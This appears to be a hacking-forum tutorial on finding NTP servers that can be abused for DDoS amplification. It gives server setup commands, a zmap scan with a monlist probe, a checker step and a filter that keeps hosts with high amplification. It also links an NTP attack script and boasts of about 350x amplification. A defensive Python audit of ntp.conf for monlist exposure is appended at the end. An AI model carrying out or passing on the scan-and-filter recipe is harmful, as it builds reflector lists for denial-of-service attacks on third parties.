- NTP scanning and filtering tutorial*
- *All the scripts used aren't coded by me and I didn't invent any of this. I'm just sharing it with you guys because sharing is caring.
- Why I made this tutorial
- I just do this to help other people that don't know how to do this. And I couldn't really find any other HQ thread that covers NTP scanning and filtering.
- Requirements
- 1. A VPS / Dedicated server that you can scan on (see 'Hosting' for some hosts). (I use CentOS 6.x)
- 2. A lot of bandwidth
- 3. ntpchecker: http://www.mediafire.com/download/69htm0...ntpchecker
- 4. ntp_123_monlist.pkt: http://www.mediafire.com/download/2c369n...onlist.pkt
- 5. A brain (jk you won't need one)
- Hosting for scanning
- Here are some hosts that I think are good for scanning:
- http://ecatel.co.uk/
- http://www.ovh.com/ca/en/
- http://www.soyoustart.com/ca/en/
- https://www.kimsufi.com/en/
- http://colocrossing.com/
- https://www.datashack.net/ (This is the one that I used and I had pretty good results)
- How to scan
- Update your server
- Code
- yum -y update
- Install repositories
- CentOS 6:
- Code
- wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
- sudo rpm -Uvh epel-release-6-8.noarch.rpm
- CentOS 7:
- Code
- wget http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-5.noarch.rpm
- sudo rpm -Uvh epel-release-7-5.noarch.rpm
- Install dependencies
- Code
- yum install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c
- Install Zmap
- Code
- yum -y install zmap
- - Upload the NTPChecker to your server -
- - Upload the ntp_123_monlist.pkt to your server -
- Start the scan
- Code
- screen zmap -p 123 -M udp --probe-args=file:/root/ntp_123_monlist.pkt -o monlist_fingerprint.txt
- It can take pretty long; please wait it out.
- Run the ntpchecker
- Give it permissions first:
- Code
- chmod 777 ntpchecker
- Run the checker:
- Code
- screen ./ntpchecker monlist_fingerprint.txt step1.txt 1 0 1
- Filter the list
- Code
- awk '$2>419{print $1}' step1.txt | sort -n | uniq | sort -R > ntpamp.txt
- Enjoy!
- (My results were about 350x amplification: http://prntscr.com/9m34rx http://prntscr.com/9mhwrl )
- Extra info
- - If you have any issues, post them below. -
- - NTP attack script: http://pastebin.com/raw/PJeYk4Bc (Thanks for the amazing script: https://hackforums.net/member.php?action...id=2623266).
- - I usually type screen first and when it opens the screen I type the command. -
- This is for educational purposes only.
- Thanks to:
- Google
- All of hackforums
- https://hackforums.net/member.php?action...id=2350472 for the dstat
- This was my first tutorial. Please leave a thanks if you have enjoyed this tutorial.
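From the defender's side, the servers a scan like this turns up are ntpd instances that still answer remote monlist queries. The following added example (not part of the original paste) audits ntp.conf text for that exposure; it is a config-only check, and the function name and the three sample configs are constructed for illustration.

```python
# Added example: config-only audit of ntp.conf text for monlist exposure.
# The three sample configs are constructed for illustration.
SAMPLE_OPEN = """\
server ntp.example.net iburst
restrict default kod nomodify notrap nopeer   # noquery is missing
"""
SAMPLE_LIMITED = """\
restrict default kod limited nomodify notrap nopeer
disable monitor
"""
SAMPLE_HARDENED = """\
restrict default kod nomodify notrap nopeer noquery
restrict -6 default kod nomodify notrap nopeer noquery
restrict 127.0.0.1
disable monitor
"""


def audit_ntp_conf(text):
    """Report whether this ntpd config would answer remote monlist queries."""
    monitor_off = False
    limited_seen = False
    default_rules = []  # one bool per 'restrict default' line: queries denied?
    for raw in text.splitlines():
        tokens = raw.split("#", 1)[0].split()  # drop comments and blank lines
        if len(tokens) < 2:
            continue
        if tokens[0] in ("disable", "enable") and "monitor" in tokens[1:]:
            monitor_off = tokens[0] == "disable"
        elif tokens[0] == "restrict":
            args = [t for t in tokens[1:] if t not in ("-4", "-6")]
            flags = set(args[1:])
            limited_seen = limited_seen or "limited" in flags
            if args and args[0] == "default":
                default_rules.append(bool(flags & {"noquery", "ignore"}))
    queries_blocked = bool(default_rules) and all(default_rules)
    # Per ntpd's access-control docs, monitoring stays active while any
    # restrict entry carries 'limited', so 'disable monitor' alone is not enough.
    monitor_effectively_off = monitor_off and not limited_seen
    return {
        "queries_blocked": queries_blocked,
        "monitor_off": monitor_effectively_off,
        "exposed": not (queries_blocked or monitor_effectively_off),
    }


if __name__ == "__main__":
    for cfg in (SAMPLE_OPEN, SAMPLE_LIMITED, SAMPLE_HARDENED):
        print(audit_ntp_conf(cfg))
```

A result with `exposed` set to True means neither a `noquery`/`ignore` default restriction nor an effective `disable monitor` was found, so the config should be tightened before the host is reachable on UDP 123.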